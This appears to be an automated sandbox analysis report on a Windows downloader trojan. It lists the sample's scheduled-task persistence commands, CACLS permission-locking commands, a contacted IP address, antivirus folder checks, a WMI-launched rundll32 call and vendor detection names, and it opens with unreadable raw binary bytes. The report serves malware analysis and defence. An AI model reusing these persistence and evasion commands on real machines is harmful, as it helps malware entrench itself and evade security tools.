€ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hX=MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00122000', u'virtual_address': u'0x00002000', u'entropy': 7.053224038741282, u'name': u'.text', u'virtual_size': u'0x00121e94'} entropy 7.05322403874 description A section with a high entropy has been found
entropy 0.998278829604 description Overall entropy of this PE file is high
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
host 77.73.134.27
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
cmdline CACLS "..\16de06bfb4" /P "test22:N"
cmdline CACLS "nbveek.exe" /P "test22:N"
cmdline cmd /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit
cmdline CACLS "nbveek.exe" /P "test22:R" /E
cmdline CACLS "..\16de06bfb4" /P "test22:R" /E
Time & API Arguments Status Return Repeated

IWbemServices_ExecMethod

 inargs.CurrentDirectory: None
inargs.CommandLine: rundll32.exe "C:\Users\test22\AppData\Local\Temp\db.dll",open
inargs.ProcessStartupInformation: None
flags: 0
method: Create
class: Win32_Process
1 0 0
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.ShortLoader.4!c
Elastic malicious (high confidence)
MicroWorld-eScan IL:Trojan.MSILZilla.9891
FireEye Generic.mg.ba218b60cb97c353
CAT-QuickHeal Backdoor.MsilFC.S22017452
ALYac IL:Trojan.MSILZilla.9891
Malwarebytes Trojan.Crypt.MSIL.Generic
Cynet Malicious (score: 100)
Alibaba TrojanDownloader:MSIL/Mokes.f71c2c66
CrowdStrike win/malicious_confidence_100% (W)
BitDefenderTheta Gen:NN.ZemsilF.36344.in0@a8Cibil
Cyren W32/MSIL_Kryptik.FFY.gen!Eldorado
Symantec Scr.Malcode!gdn33
ESET-NOD32 a variant of MSIL/Agent.UZA
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Downloader.MSIL.ShortLoader.gen
BitDefender IL:Trojan.MSILZilla.9891
Avast Win32:DropperX-gen [Drp]
Tencent Msil.Trojan-Downloader.Shortloader.Udkl
DrWeb Trojan.MulDropNET.43
VIPRE IL:Trojan.MSILZilla.9891
TrendMicro TROJ_GEN.R002C0DCL23
Trapmine malicious.moderate.ml.score
Sophos Troj/ILAgent-I
Ikarus Win32.Outbreak
Avira HEUR/AGEN.1357339
Gridinsoft Trojan.Win32.Gen.bot
Arcabit IL:Trojan.MSILZilla.D26A3
ViRobot Trojan.Win.Z.Agent.1190400.A
ZoneAlarm HEUR:Trojan-Downloader.MSIL.ShortLoader.gen
GData IL:Trojan.MSILZilla.9891
Google Detected
AhnLab-V3 Malware/Win.Generic.C4478643
Acronis suspicious
VBA32 Trojan.MSIL.Injector.gen
MAX malware (ai score=82)
Cylance unsafe
TrendMicro-HouseCall TROJ_GEN.R002C0DCL23
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
SentinelOne Static AI - Malicious PE
Fortinet MSIL/GenKryptik.FFMZ!tr
AVG Win32:DropperX-gen [Drp]
Panda Trj/GdSda.A